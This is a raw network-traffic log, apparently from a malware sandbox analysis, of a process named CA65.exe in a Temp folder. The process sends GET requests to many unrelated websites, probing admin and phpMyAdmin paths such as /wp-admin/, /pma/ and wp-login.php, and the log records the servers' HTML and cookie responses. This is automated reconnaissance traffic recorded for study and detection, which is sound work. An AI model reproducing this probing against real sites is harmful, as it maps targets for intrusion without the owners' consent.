2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 2f 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 75 74 6f 6d 61 74 69 Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/admin/'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you will be automati
2023-12-22 20:15:13 UTC	1246	IN	Data Raw: 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 0a 09 09 09 5d 0a 09 09 29 Data Ascii: ey', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCString()]])
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
331	192.168.2.4	57605	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	163	OUT	GET /pma/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:13 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:15:13 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:15:13 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:13 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:15:13 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:15:13 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:14 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:15:14 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:15:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:14 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
332	192.168.2.4	57702	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	256	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	1304	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secure
2023-12-22 20:15:13 UTC	1399	IN	Data Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 Data Ascii: set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secureset-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:13 GMT; Max-Age=0; path=/; secureset
2023-12-22 20:15:13 UTC	5866	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
333	192.168.2.4	57699	216.194.166.146	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	172	OUT	GET /wp-admin/ HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	416	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:13 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://adm-works.com/wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
334	192.168.2.4	57697	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	262	OUT	GET /admin/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:13 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:13 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
335	192.168.2.4	58344	104.17.71.73	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	392	OUT	GET /pma/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=6e89eba53f0987720ee71e1440dfa8c230359fa8-1703276112; __cf_bm=C86YPVSqmjEsq5GjxRPJxJ3CdGzukUUVUs76EBPNfQM-1703276112-1-AeTBduVZOJEygLyLFclJOTU+KiV0a2Fnc22zbh9aNyl/CKPCDSIMi9DoE56K0VNNDMyjoueX/yTmRykzLyXAqzc= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	276	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/pma/ Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b091c58a02263-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
336	192.168.2.4	58343	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	169	OUT	GET /admin HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	623	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/admin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6NCP%2FDUOsajIXaQsRU4inl0qcDxXOJO8vKbiGiMvTXV%2BZDX0PcmcnW%2FmY%2F8E5uRMhndw0u6TxpgwAzgfvUrm7szHEmBJkyMB5zwOWOYnImsjcPNwyZ4NLZBtkMFm%2B6pG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b091c49872594-MIA
2023-12-22 20:15:13 UTC	245	IN	Data Raw: 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: ef<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/admin">here</a>.</p></body></html>
